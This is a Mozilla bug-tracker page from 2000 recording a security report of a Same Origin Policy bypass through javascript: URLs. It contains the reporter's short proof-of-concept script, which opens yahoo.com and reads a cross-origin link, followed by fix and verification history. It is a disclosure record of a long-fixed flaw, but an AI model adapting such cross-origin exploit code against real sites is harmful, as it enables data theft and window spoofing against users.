Circumventing Same Origin security policy using javascript: URLs

VERIFIED FIXED in M15

Status

()

defect
P3
normal
VERIFIED FIXED
20 years ago
13 years ago

People

(Reporter: norrisboyd, Assigned: norrisboyd)

Tracking

Trunk
x86
Windows NT
Points:
---
Bug Flags:
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: fix in hand, )

Subject: 
        Circumventing Same Origin security policy using javascript: URLs
   Date: 
        Thu, 16 Mar 2000 16:23:00 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




It is possible to circumvent Same Origin security policy using
javascript: URLs.
The problem is changing the location of a target document to javascript
which changes the document content while the location is that of the
target document.
This also allows window spoofing.

I would suggest disallowing navigating to javascript: URLs accross
domains.

The code is:
------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com");
a.location="javascript:document.open();document.write('<IFRAME
SRC=http://www.yahoo.com></IFRAME><A
HREF=javascript:alert(window.frames[0].document.links[0].href)>Click
here to see the first link from Yahoo</A>');document.close()";
</SCRIPT>
Status: NEW → ASSIGNED
Target Milestone: M15
Marking beta2.
Keywords: beta2
Whiteboard: fix in hand
Fixed:
Checking in layout/html/document/src/nsHTMLDocument.cpp;
/m/pub/mozilla/layout/html/document/src/nsHTMLDocument.cpp,v  <--  nsHTMLDocumen
t.cpp
new revision: 3.207; previous revision: 3.206
Status: ASSIGNED → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Group: netscapeconfidential?
CC'ing joro@nat.bg
Group: netscapeconfidential?
Verified fixed.
Status: RESOLVED → VERIFIED
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.